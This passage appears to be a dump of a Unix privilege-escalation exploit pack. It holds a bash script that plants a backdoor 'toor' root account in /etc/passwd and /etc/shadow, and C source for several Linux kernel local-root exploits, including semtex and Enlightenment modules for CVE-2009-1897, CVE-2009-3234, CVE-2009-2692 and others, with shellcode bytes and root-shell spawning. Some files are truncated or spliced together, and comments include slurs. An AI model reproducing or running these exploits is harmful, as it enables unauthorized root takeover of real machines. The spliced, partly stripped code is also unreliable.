| # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh 17 | # [*] Ubuntu PAM MOTD local root 18 | # [*] Backuped /home/user/.ssh/authorized_keys 19 | # [*] SSH key set up 20 | # [*] Backuped /home/user/.cache 21 | # [*] spawn ssh 22 | # [+] owned: /etc/passwd 23 | # [*] spawn ssh 24 | # [+] owned: /etc/shadow 25 | # [*] Restored /home/user/.cache 26 | # [*] Restored /home/user/.ssh/authorized_keys 27 | # [*] SSH key removed 28 | # [+] Success! Use password toor to get root 29 | # Password: 30 | # root@ubuntu:/home/user# id 31 | # uid=0(root) gid=0(root) groupes=0(root) 32 | # 33 | P='toor:x:0:0:root:/root:/bin/bash' 34 | S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' 35 | echo "[*] Ubuntu PAM MOTD local root" 36 | [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 37 | [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 38 | [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 39 | backup() { 40 | [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak 41 | [ -e "$1" ] || return 0 42 | mv "$1"{,.bak} || return 1 43 | echo "[*] Backuped $1" 44 | } 45 | restore() { 46 | [ -e "$1" ] && rm -rf "$1" 47 | [ -e "$1".bak ] || return 0 48 | mv "$1"{.bak,} || return 1 49 | echo "[*] Restored $1" 50 | } 51 | key_create() { 52 | backup ~/.ssh/authorized_keys 53 | ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 54 | [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } 55 | mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 56 | echo "[*] SSH key set up" 57 | } 58 | key_remove() { 59 | rm -f "$KEY" 60 | restore ~/.ssh/authorized_keys 61 | echo "[*] SSH key removed" 62 | } 63 | own() { 64 | [ -e ~/.cache ] && rm -rf ~/.cache 65 | ln -s "$1" ~/.cache || return 1 66 | echo "[*] spawn ssh" 67 | ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true 68 | [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } 69 | echo "[+] owned: $1" 70 | } 71 | bye() { 72 | key_remove 73 | exit 1 74 | } 75 | KEY="$(mktemp -u)" 76 | key_create || { echo "[-] Failed to setup SSH key"; exit 1; } 77 | backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } 78 | own /etc/passwd && echo "$P" >> /etc/passwd 79 | own /etc/shadow && echo "$S" >> /etc/shadow 80 | restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } 81 | key_remove 82 | echo "[+] Success! Use password toor to get root" 83 | su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ 84 | chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor -------------------------------------------------------------------------------- /2012/acid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/acid -------------------------------------------------------------------------------- /2012/exp1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/exp1 -------------------------------------------------------------------------------- /2012/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/exploit -------------------------------------------------------------------------------- /2012/full-nelson: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/full-nelson -------------------------------------------------------------------------------- /2012/gayros: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/gayros -------------------------------------------------------------------------------- /2012/krad313: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/krad313 -------------------------------------------------------------------------------- /2012/local-root-exploit-gayros: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/local-root-exploit-gayros -------------------------------------------------------------------------------- /2012/pwnkernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/pwnkernel -------------------------------------------------------------------------------- /2012/root1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/root1 -------------------------------------------------------------------------------- /2012/runx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/runx -------------------------------------------------------------------------------- /2012/tivoli: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/tivoli -------------------------------------------------------------------------------- /2012/ubuntu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/ubuntu -------------------------------------------------------------------------------- /2012/vmsplice-local-root-exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/vmsplice-local-root-exploit -------------------------------------------------------------------------------- /2013/2.6.17.4_2013: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.17.4_2013 -------------------------------------------------------------------------------- /2013/2.6.18: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.18 -------------------------------------------------------------------------------- /2013/2.6.32-2013: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.32-2013 -------------------------------------------------------------------------------- /2013/2.6.32-46.1.BHsmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/2.6.32-46.1.BHsmp -------------------------------------------------------------------------------- /2013/2.6.37 to 3.x.x/semtex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * linux 2.6.37-3.x.x x86_64, ~100 LOC 3 | * gcc-4.6 -O2 semtex.c && ./a.out 4 | * 2010 sd@fucksheep.org, salut! 5 | * 6 | * update may 2013: 7 | * seems like centos 2.6.32 backported the perf bug, lol. 8 | * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. 9 | */ 10 | 11 | #define _GNU_SOURCE 1 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define BASE 0x380000000 23 | #define SIZE 0x010000000 24 | #define KSIZE 0x2000000 25 | #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) 26 | 27 | void fuck() { 28 | int i,j,k; 29 | uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; 30 | uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); 31 | uint64_t kbase = ((uint64_t)current)>>36; 32 | uint32_t *fixptr = (void*) AB(1); 33 | *fixptr = -1; 34 | 35 | for (i=0; i<4000; i+=4) { 36 | uint64_t *p = (void *)¤t[i]; 37 | uint32_t *t = (void*) p[0]; 38 | if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; 39 | for (j=0; j<20; j++) { for (k = 0; k < 8; k++) 40 | if (((uint32_t*)uids)[k] != t[j+k]) goto next; 41 | for (i = 0; i < 8; i++) t[j+i] = 0; 42 | for (i = 0; i < 10; i++) t[j+9+i] = -1; 43 | return; 44 | next:; } 45 | } 46 | } 47 | 48 | void sheep(uint32_t off) { 49 | uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; 50 | int fd = syscall(298, buf, 0, -1, -1, 0); 51 | assert(!close(fd)); 52 | } 53 | 54 | 55 | int main() { 56 | uint64_t u,g,needle, kbase, *p; uint8_t *code; 57 | uint32_t *map, j = 5; 58 | int i; 59 | struct { 60 | uint16_t limit; 61 | uint64_t addr; 62 | } __attribute__((packed)) idt; 63 | assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); 64 | memset(map, 0, SIZE); 65 | sheep(-1); sheep(-2); 66 | for (i = 0; i < SIZE/4; i++) if (map[i]) { 67 | assert(map[i+1]); 68 | break; 69 | } 70 | assert(i 15 | 16 | #define JUMP 0x0000100000001000LL 17 | #define BASE 0x380000000 18 | #define SIZE 0x010000000 19 | #define KSIZE 0x2000000 20 | 21 | static long ugid; 22 | 23 | void patch_current() { 24 | int i,j,k; 25 | char *current = *(char**)(((long)&i) & (-8192)); 26 | long kbase = ((long)current)>>36; 27 | 28 | for (i=0; i<4000; i+=4) { 29 | long *p = (void *)¤t[i]; 30 | int *t = (void*) p[0]; 31 | if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; 32 | for (j=0; j<20; j++) { 33 | for (k = 0; k < 8; k++) 34 | if (((int*)&ugid)[k%2] != t[j+k]) goto next; 35 | for (i = 0; i < 8; i++) t[j+i] = 0; 36 | for (i = 0; i < 10; i++) t[j+9+i] = -1; 37 | return; 38 | next:; } 39 | } 40 | } 41 | 42 | 43 | int main() 44 | { 45 | long u = getuid(); 46 | long g = getgid(); 47 | int i, f = socket(16,3,4); 48 | static int n[10] = {40,0x10014,0,0,45,-1}; 49 | 50 | assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1); 51 | 52 | setresuid(u,u,u); setresgid(g,g,g); 53 | ugid = (g<<32)|u; 54 | 55 | memcpy(1<<12, &patch_current, 1024); 56 | for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current; 57 | send(f, n, sizeof(n), 0); 58 | setuid(0); 59 | return execl("/bin/bash", "-sh", 0); 60 | } 61 | -------------------------------------------------------------------------------- /2013/3.8.9 and down/perf_swevent_init: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/3.8.9 and down/perf_swevent_init -------------------------------------------------------------------------------- /2013/enlightenment/exp_cheddarbay.c: -------------------------------------------------------------------------------- 1 | /* wunderbar */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "exp_framework.h" 12 | 13 | struct exploit_state *exp_state; 14 | 15 | #define OFFSET_OF_FLAGS 0x8 16 | 17 | struct sock { 18 | char gibberish1[0x60]; 19 | char gibberish2[0xe0]; 20 | unsigned long gibberish3[0x50]; 21 | }; 22 | 23 | char *desc = "Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root"; 24 | char *cve = "CVE-2009-1897"; 25 | 26 | int prepare(unsigned char *buf) 27 | { 28 | struct sock *sk = (struct sock *)buf; 29 | struct pollfd pfd; 30 | unsigned long target_addr; 31 | int i; 32 | int fd; 33 | 34 | fd = open("/dev/net/tun", O_RDONLY); 35 | if (fd < 0) { 36 | fprintf(stdout, "Unable to open /dev/net/tun!\n"); 37 | return 0; 38 | } 39 | close(fd); 40 | fd = open("/dev/net/tun", O_RDWR); 41 | if (fd < 0) { 42 | fprintf(stdout, "Unable to open /dev/net/tun!\n"); 43 | return 0; 44 | } 45 | 46 | target_addr = exp_state->get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11); 47 | 48 | memset(sk->gibberish1, 0, sizeof(sk->gibberish1)); 49 | memset(sk->gibberish2, 0, sizeof(sk->gibberish2)); 50 | for (i = 0; i < sizeof(sk->gibberish3)/sizeof(sk->gibberish3[0]); i++) 51 | sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS; 52 | 53 | pfd.fd = fd; 54 | pfd.events = POLLIN | POLLOUT; 55 | poll(&pfd, 1, 0); 56 | 57 | close(fd); 58 | 59 | return EXECUTE_AT_NONZERO_OFFSET | 1; 60 | } 61 | 62 | int requires_null_page = 1; 63 | 64 | int requires_symbols_to_trigger = 1; 65 | 66 | int get_exploit_state_ptr(struct exploit_state *ptr) 67 | { 68 | exp_state = ptr; 69 | return 0; 70 | } 71 | 72 | int trigger(void) 73 | { 74 | int fd; 75 | fd = open("/dev/net/tun", O_RDONLY); 76 | if (fd < 0) 77 | return 0; 78 | mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); 79 | close(fd); 80 | 81 | return 1; 82 | } 83 | 84 | int post(void) 85 | { 86 | return RUN_ROOTSHELL; 87 | } 88 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_ingom0wnar.c: -------------------------------------------------------------------------------- 1 | /* Ingo m0wnar */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "exp_framework.h" 10 | 11 | #undef __NR_perf_counter_open 12 | #ifdef __x86_64__ 13 | #define __NR_perf_counter_open 298 14 | //#define OFFSET_OF_IP 0x88 15 | #define BUF_SIZE 0x100 16 | #else 17 | #define __NR_perf_counter_open 336 18 | //#define OFFSET_OF_IP 0x5c 19 | #define BUF_SIZE 0x80 20 | #endif 21 | 22 | struct perf_counter_attr { 23 | unsigned int type; 24 | unsigned int size; 25 | }; 26 | 27 | struct exploit_state *exp_state; 28 | 29 | char *desc = "Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)"; 30 | char *cve = "CVE-2009-3234"; 31 | 32 | int get_exploit_state_ptr(struct exploit_state *ptr) 33 | { 34 | exp_state = ptr; 35 | return 0; 36 | } 37 | 38 | int requires_null_page = 0; 39 | 40 | 41 | static char *dirty_code; 42 | 43 | int prepare(unsigned char *ptr) 44 | { 45 | char *mem; 46 | int fd; 47 | 48 | fd = open("./suckit_selinux", O_CREAT | O_WRONLY, 0644); 49 | if (fd < 0) { 50 | printf("unable to create file\n"); 51 | exit(1); 52 | } 53 | 54 | mem = (char *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 55 | if (mem == MAP_FAILED) { 56 | printf("unable to mmap\n"); 57 | unlink("./suckit_selinux"); 58 | exit(1); 59 | } 60 | mem[0] = '\xff'; 61 | mem[1] = '\x15'; 62 | *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 6 : (unsigned int)mem + 12; 63 | mem[6] = '\xff'; 64 | mem[7] = '\x25'; 65 | *(unsigned int *)&mem[8] = (sizeof(unsigned long) != sizeof(unsigned int)) ? sizeof(unsigned long) : (unsigned int)mem + 16; 66 | *(unsigned long *)&mem[12] = (unsigned long)exp_state->own_the_kernel; 67 | *(unsigned long *)&mem[12 + sizeof(unsigned long)] = (unsigned long)exp_state->exit_kernel; 68 | write(fd, mem, 0x1000); 69 | close(fd); 70 | munmap(mem, 0x1000); 71 | 72 | fd = open("./suckit_selinux", O_RDONLY); 73 | if (fd < 0) { 74 | printf("unable to open file for reading\n"); 75 | unlink("./suckit_selinux"); 76 | exit(1); 77 | } 78 | dirty_code = (char *)mmap(NULL, 0x1000, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0); 79 | if (dirty_code == MAP_FAILED) { 80 | printf("unable to mmap\n"); 81 | exit(1); 82 | } 83 | 84 | unlink("./suckit_selinux"); 85 | 86 | return 0; 87 | } 88 | 89 | int trigger(void) 90 | { 91 | struct perf_counter_attr *ctr; 92 | int tid; 93 | int i; 94 | 95 | ctr = (struct perf_counter_attr *)calloc(1, 0x1000); 96 | if (ctr == NULL) { 97 | fprintf(stdout, "out of memory\n"); 98 | exit(1); 99 | } 100 | 101 | /* Ingo's 3 line backdoor, reminds me of wait4() */ 102 | //ctr->size = BUF_SIZE; 103 | //*(unsigned long *)((char *)ctr + OFFSET_OF_IP) = (unsigned long)dirty_code; 104 | //syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL); 105 | 106 | /* just in case it gets compiled differently... ;) */ 107 | ctr->size = BUF_SIZE; 108 | for (i = 0x40; i < BUF_SIZE; i+= sizeof(unsigned long)) { 109 | if (!(i % (sizeof(unsigned long) * sizeof(unsigned long)))) 110 | continue; 111 | *(unsigned long *)((char *)ctr + i) = (unsigned long)dirty_code; 112 | } 113 | 114 | syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL); 115 | 116 | /* if we're successful, we won't get to this next line */ 117 | 118 | fprintf(stdout, "System is not vulnerable.\n"); 119 | exit(1); 120 | 121 | return 0; 122 | } 123 | 124 | int post(void) 125 | { 126 | return RUN_ROOTSHELL; 127 | } 128 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_paokara.c: -------------------------------------------------------------------------------- 1 | /* CVE-2009-2908 2 | Integrated into enlightenment upon Fotis Loukos' request 3 | Also ported to x64 4 | Original x86 exploit was written by Fotis Loukos: 5 | http://fotis.loukos.me/security/exploits/paokara.c 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #define __USE_GNU 12 | #include 13 | #include 14 | #include "exp_framework.h" 15 | 16 | struct exploit_state *exp_state; 17 | 18 | struct myinodeops { 19 | void *dontcare[17]; 20 | void *getxattr; 21 | }; 22 | 23 | char *desc = "Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root"; 24 | char *cve = "CVE-2009-2908"; 25 | 26 | int prepare(unsigned char *buf) 27 | { 28 | /* this gets placed at 0x1 because we overwrite the i_op with 0x1 29 | in our loop that sets the mutex count properly 30 | */ 31 | struct myinodeops *ops = (struct myinodeops *)(buf + 1); 32 | unsigned long *lbuf = (unsigned long *)buf; 33 | int i; 34 | 35 | /* make sure mutex count is 1, handle any configuration 36 | */ 37 | for (i = 0; i < 200; i++) 38 | lbuf[i] = 1; 39 | 40 | ops->getxattr = exp_state->own_the_kernel; 41 | 42 | return 0; 43 | } 44 | 45 | int requires_null_page = 1; 46 | 47 | int get_exploit_state_ptr(struct exploit_state *ptr) 48 | { 49 | exp_state = ptr; 50 | return 0; 51 | } 52 | 53 | int trigger(void) 54 | { 55 | char buf1[4096]; 56 | char buf2[4096]; 57 | int fd; 58 | char *path = getenv("XPL_PATH"); 59 | if (path == NULL) { 60 | fprintf(stdout, " [+] XPL_PATH environment variable not set. Defaulting to current directory.\n"); 61 | path = "."; 62 | } 63 | snprintf(buf1, sizeof(buf1), "%s/lala", path); 64 | snprintf(buf2, sizeof(buf2), "%s/koko", path); 65 | 66 | if (open(buf1, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600) < 0) { 67 | fprintf(stdout, "Failed to create %s\n", buf1); 68 | return 0; 69 | } 70 | link(buf1, buf2); 71 | unlink(buf1); 72 | if ((fd = open(buf2, O_RDWR | O_CREAT | O_NOFOLLOW, 0600)) < 0) { 73 | fprintf(stdout, "Failed to create %s\n", buf2); 74 | return 0; 75 | } 76 | unlink(buf2); 77 | write(fd, "kot!", 4); 78 | 79 | return 1; 80 | } 81 | 82 | int post(void) 83 | { 84 | return RUN_ROOTSHELL; 85 | } 86 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_powerglove.c: -------------------------------------------------------------------------------- 1 | /* powerglove */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "exp_framework.h" 8 | 9 | #undef __NR_perf_counter_open 10 | #ifdef __x86_64__ 11 | #define __NR_perf_counter_open 298 12 | #else 13 | #define __NR_perf_counter_open 336 14 | #endif 15 | 16 | struct perf_counter_attr { 17 | unsigned int type; 18 | unsigned int size; 19 | }; 20 | 21 | struct exploit_state *exp_state; 22 | 23 | char *desc = "Powerglove: Linux 2.6.31 perf_counter local root"; 24 | char *cve = "CVE-2009-3234"; 25 | 26 | int get_exploit_state_ptr(struct exploit_state *ptr) 27 | { 28 | exp_state = ptr; 29 | return 0; 30 | } 31 | 32 | int requires_null_page = 1; 33 | 34 | int prepare(unsigned char *ptr) 35 | { 36 | return EXIT_KERNEL_TO_NULL; 37 | } 38 | 39 | int trigger(void) 40 | { 41 | struct perf_counter_attr *ctr; 42 | 43 | ctr = (struct perf_counter_attr *)calloc(1, 0x1000); 44 | if (ctr == NULL) { 45 | fprintf(stdout, "bleh\n"); 46 | exit(1); 47 | } 48 | 49 | #ifdef __x86_64__ 50 | ctr->size = 0xd0; 51 | #else 52 | ctr->size = 0x60; 53 | #endif 54 | 55 | syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL); 56 | 57 | return 0; 58 | } 59 | 60 | int post(void) 61 | { 62 | return RUN_ROOTSHELL; 63 | } 64 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_therebel.c: -------------------------------------------------------------------------------- 1 | /* the rebel */ 2 | #include 3 | #include 4 | #include 5 | #include "exp_framework.h" 6 | 7 | struct dst_entry { 8 | void *next; 9 | int refcnt; 10 | int use; 11 | void *child; 12 | void *dev; 13 | short error; 14 | short obsolete; 15 | int flags; 16 | unsigned long lastuse; 17 | unsigned long expires; 18 | unsigned short header_len; 19 | unsigned short trailer_len; 20 | unsigned int metrics[13]; 21 | /* need to have this here and empty to avoid problems with 22 | dst.path being used by dst_mtu */ 23 | void *path; 24 | unsigned long rate_last; 25 | unsigned long rate_tokens; 26 | /* things change from version to version past here, so let's do this: */ 27 | void *own_the_kernel[8]; 28 | }; 29 | 30 | struct exploit_state *exp_state; 31 | 32 | char *desc = "The Rebel: Linux < 2.6.19 udp_sendmsg() local root"; 33 | char *cve = "CVE-2009-2698"; 34 | 35 | int get_exploit_state_ptr(struct exploit_state *ptr) 36 | { 37 | exp_state = ptr; 38 | return 0; 39 | } 40 | 41 | int requires_null_page = 1; 42 | 43 | int prepare(unsigned char *ptr) 44 | { 45 | struct dst_entry *mem = (struct dst_entry *)ptr; 46 | int i; 47 | 48 | /* for stealthiness based on reversing, makes sure that frag_off 49 | is set in skb so that a printk isn't issued alerting to the 50 | exploit in the ip_select_ident path 51 | */ 52 | mem->metrics[1] = 0xfff0; 53 | /* the actual "output" function pointer called by dst_output */ 54 | for (i = 0; i < 10; i++) 55 | mem->own_the_kernel[i] = exp_state->own_the_kernel; 56 | 57 | return 0; 58 | } 59 | 60 | int trigger(void) 61 | { 62 | struct sockaddr sock = { 63 | .sa_family = AF_UNSPEC, 64 | .sa_data = "CamusIsAwesome", 65 | }; 66 | char buf[1024] = {0}; 67 | int fd; 68 | 69 | fd = socket(PF_INET, SOCK_DGRAM, 0); 70 | if (fd < 0) { 71 | fprintf(stdout, "failed to create socket\n"); 72 | return 0; 73 | } 74 | 75 | sendto(fd, buf, 1024, MSG_PROXY | MSG_MORE, &sock, sizeof(sock)); 76 | sendto(fd, buf, 1024, 0, &sock, sizeof(sock)); 77 | 78 | return 1; 79 | } 80 | 81 | int post(void) 82 | { 83 | return RUN_ROOTSHELL; 84 | } 85 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_vmware.c: -------------------------------------------------------------------------------- 1 | /* all credits to Tavis Ormandy/Julien Tinnes 2 | 3 | I (being Ingo Molnar, of course) simply replaced the ring0 XSS 4 | with more suitable shellcode 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include "exp_framework.h" 16 | 17 | struct exploit_state *exp_state; 18 | 19 | char *desc = "CVE-2009-2267: VMWare vm86 guest local root"; 20 | char *cve = "CVE-2009-2267"; 21 | 22 | #define REAL_TO_VIRT(cs, ip) ((void *)(((cs) << 4) + ((ip) & 0xffff))) 23 | #define EFLAGS_TF_MASK 0x100 24 | 25 | void enter_vm86(void) 26 | { 27 | struct vm86plus_struct vm = {0}; 28 | 29 | vm.cpu_type = CPU_586; 30 | 31 | vm.regs.eflags = EFLAGS_TF_MASK; 32 | vm.regs.esp = 0xdeadc01d; 33 | vm.regs.eip = 0x00000000; 34 | vm.regs.cs = 0x0090; 35 | vm.regs.ss = 0xffff; 36 | 37 | memcpy(REAL_TO_VIRT(vm.regs.cs, vm.regs.eip), 38 | "\x9a\xdd\xcc\x00\x00\xbb\xaa", 7); 39 | 40 | vm86(VM86_ENTER, &vm); 41 | 42 | return; 43 | } 44 | 45 | int prepare(unsigned char *buf) 46 | { 47 | char *newbuf; 48 | 49 | newbuf = (char *)mremap(buf, PAGE_SIZE, 1024 * 1024, 0); 50 | if (newbuf == MAP_FAILED) { 51 | printf("failed to remap NULL page\n"); 52 | exit(1); 53 | } 54 | 55 | // mov esp, edi 56 | buf[0] = '\x89'; 57 | buf[1] = '\xfc'; 58 | // sub esp, 0x50 59 | buf[2] = '\x83'; 60 | buf[3] = '\xec'; 61 | buf[4] = '\x50'; 62 | // call own_the_kernel 63 | buf[5] = '\xff'; 64 | buf[6] = '\x15'; 65 | *(unsigned int *)&buf[7] = (unsigned int)buf + 17; 66 | // jmp exit_kernel 67 | buf[11] = '\xff'; 68 | buf[12] = '\x25'; 69 | *(unsigned int *)&buf[13] = (unsigned int)buf + 21; 70 | *(unsigned long *)&buf[17] = (unsigned long)exp_state->own_the_kernel; 71 | *(unsigned long *)&buf[21] = (unsigned long)exp_state->exit_kernel; 72 | 73 | return 0; 74 | } 75 | 76 | int requires_null_page = 1; 77 | 78 | int get_exploit_state_ptr(struct exploit_state *ptr) 79 | { 80 | exp_state = ptr; 81 | return 0; 82 | } 83 | 84 | int trigger(void) 85 | { 86 | enter_vm86(); 87 | 88 | return 1; 89 | } 90 | 91 | int post(void) 92 | { 93 | return RUN_ROOTSHELL; 94 | } 95 | -------------------------------------------------------------------------------- /2013/enlightenment/exp_wunderbar.c: -------------------------------------------------------------------------------- 1 | /* wunderbar */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "exp_framework.h" 9 | 10 | struct exploit_state *exp_state; 11 | 12 | #define DOMAINS_STOP -1 13 | #define VIDEO_SIZE 4171600 14 | #ifndef IPPROTO_SCTP 15 | #define IPPROTO_SCTP 132 16 | #endif 17 | #ifndef PX_PROTO_OL2TP 18 | #define PX_PROTO_OL2TP 1 19 | #endif 20 | #ifndef PF_IUCV 21 | #define PF_IUCV 32 22 | #endif 23 | 24 | const int domains[][3] = { { PF_APPLETALK, SOCK_DGRAM, 0 }, 25 | {PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 }, 26 | {PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 }, 27 | {PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 }, 28 | {PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP }, 29 | {PF_PPPOX, SOCK_DGRAM, 0 }, 30 | {PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP }, 31 | {DOMAINS_STOP, 0, 0 } 32 | }; 33 | 34 | char *desc = "Wunderbar Emporium: Linux 2.X sendpage() local root"; 35 | char *cve = "CVE-2009-2692"; 36 | 37 | int prepare(unsigned char *buf) 38 | { 39 | return STRAIGHT_UP_EXECUTION_AT_NULL; 40 | } 41 | 42 | int requires_null_page = 1; 43 | 44 | int get_exploit_state_ptr(struct exploit_state *ptr) 45 | { 46 | exp_state = ptr; 47 | return 0; 48 | } 49 | 50 | int trigger(void) 51 | { 52 | while (exp_state->got_ring0 == 0) { 53 | char template[] = "/tmp/sendfile.XXXXXX"; 54 | int d; 55 | int in, out; 56 | 57 | // Setup source descriptor 58 | if ((in = mkstemp(template)) < 0) { 59 | fprintf(stdout, "failed to open input descriptor, %m\n"); 60 | return 0; 61 | } 62 | 63 | unlink(template); 64 | 65 | // Find a vulnerable domain 66 | for (d = 0; domains[d][0] != DOMAINS_STOP; d++) { 67 | if ((out = socket(domains[d][0], domains[d][1], domains[d][2])) >= 0) 68 | break; 69 | } 70 | 71 | if (out < 0) { 72 | fprintf(stdout, "unable to find a vulnerable domain, sorry\n"); 73 | return 0; 74 | } 75 | 76 | // Truncate input file to some large value 77 | ftruncate(in, getpagesize()); 78 | 79 | // sendfile() to trigger the bug. 80 | sendfile(out, in, NULL, getpagesize()); 81 | } 82 | 83 | return 1; 84 | } 85 | 86 | int post(void) 87 | { 88 | return RUN_ROOTSHELL; 89 | } 90 | -------------------------------------------------------------------------------- /2013/enlightenment/funny.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2013/enlightenment/funny.jpg -------------------------------------------------------------------------------- /2013/enlightenment/pwnkernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | 